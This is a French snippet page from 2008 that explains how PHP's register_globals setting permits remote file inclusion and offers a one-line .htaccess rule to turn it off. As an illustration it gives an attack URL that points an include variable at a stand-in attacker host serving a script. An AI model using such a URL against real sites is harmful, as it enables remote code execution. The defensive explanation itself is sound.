Protection contre les attaques de hacker avec register global on
Information sur le code source
Enregistr� le 22 Juin 2008 - Vu 15266 fois
| Votre avis: |
|
| |
[66] sources en Apache voir
|
Description du code source
Informations sur le code source
Les hackers exploitent souvent la facilité qui consiste à définir les variables GET ou POST en variables globales. Par exemple la variable $_GET['var1'] est également accessible par $var1. Le cas le plus fréquent d'exploitation est l'utilisation d'une variable préfixant le chemin des includes comme :
include($prefix_path . '/chemin_d_include.php');
Ainsi l'appel de l'url http://www.example.com/page.php?prefix_path=http://sitehacker.com/script.txt peut permettre de faire exécuter l'include externe http://sitehacker.com/script.txt/chemin_d_include.php.
La désactivation de cette option nécessite de contrôler tous le code pour toujours accéder aux variables avec les tableaux $_ENV, $_GET, $_POST, $_REQUEST, $_COOKIE et $_SERVER et non directement avec leur nom. Pour plus d'informations vous pouvez lire l'explication détaillée
ici.
Pour éviter cette faille, il suffit de désactiver l'enregistrement global avec cette règle dans le fichier .htaccess.
Code Source
.01
.02
.03
.04
.05
.06
.07
.08
.09
.10
.11
.12
.13
.14
.15
.16
.17
.18
.19
.20
.21
|
|
################################################################################
# #
# __ _ __ _ #
# __ ______/ /______ _ ______(_) /_(_)__ ___ _ #
# / // / __/ / __/ -_) |/|/ / __/ / __/ / _ \/ _ `/ #
# \_,_/_/ /_/_/ \__/|__,__/_/ /_/\__/_/_//_/\_, / #
# /___/ #
# #
# #
################################################################################
# #
# Titre : Protection contre les attaques de hacker avec register... #
# #
# URL : /scripts66-Apache.htm #
# Auteur : admin #
# Date �dition : 22 Juin 2008 #
# #
################################################################################
SetEnv REGISTER_GLOBALS 0
|
Librairie
Langages de programmation
La librairie est ouverte � tous et elle est acc�s principalement sur les langages Snippets.
Vous trouverez aussi d'autres langages de programmation tel que le CSS, HTML, AJAX, ASP..
Plus de 300 r�f�rences facilement accessibles. Visiter